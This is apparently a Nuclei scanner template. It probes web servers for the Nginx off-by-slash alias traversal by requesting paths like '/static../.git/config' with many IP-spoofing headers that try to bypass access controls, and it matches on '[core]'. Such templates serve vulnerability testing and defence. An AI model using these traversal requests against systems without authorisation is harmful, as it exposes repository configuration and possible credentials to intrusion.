id: git-config-nginxoffbyslash
info:
  name: Nginx off-by-slash exposes Git config
  author: organiccrap
  severity: medium
  description: Nginx off-by-slash vulnerability exposes Git configuration.
  tags: config,exposure,nginx
  reference:
    - https://twitter.com/Random_Robbie/status/1262676628167110656
    - https://github.com/PortSwigger/nginx-alias-traversal/blob/master/off-by-slash.py

requests:
  - method: GET
    headers:
      Proxy-Host: 127.0.0.1
      Real-Ip: 127.0.0.1
      X-Client-IP: 127.0.0.1
      X-Custom-IP-Authorization: 127.0.0.1
      X-Forwarded: 127.0.0.1
      X-Forwarded-By: 127.0.0.1
      X-Forwarded-For: 127.0.0.1
      X-Forwarded-For-Original: 127.0.0.1
      X-Forwarded-Host: 127.0.0.1
      X-Forwarded-Port: 127.0.0.1
      X-Forwarded-Server: 127.0.0.1
      X-Forwarder-For: 127.0.0.1
      X-Forward-For: 127.0.0.1
      X-Host: 127.0.0.1
      X-Http-Destinationurl: 127.0.0.1
      X-Http-Host-Override: 127.0.0.1
      X-Original-Remote-Addr: 127.0.0.1
      X-Original-Url: 127.0.0.1
      X-Originating-IP: 127.0.0.1
      X-Proxy-Url: 127.0.0.1
      X-Real-Ip: 127.0.0.1
      X-Remote-Addr: 127.0.0.1
      X-Remote-IP: 127.0.0.1
      X-Rewrite-Url: 127.0.0.1
    path:
      - '{{BaseURL}}/static../.git/config'
      - '{{BaseURL}}/js../.git/config'
      - '{{BaseURL}}/images../.git/config'
      - '{{BaseURL}}/img../.git/config'
      - '{{BaseURL}}/css../.git/config'
      - '{{BaseURL}}/assets../.git/config'
      - '{{BaseURL}}/content../.git/config'
      - '{{BaseURL}}/events../.git/config'
      - '{{BaseURL}}/media../.git/config'
      - '{{BaseURL}}/lib../.git/config'

    stop-at-first-match: true
    matchers:
      - type: word
        words:
          - '[core]'
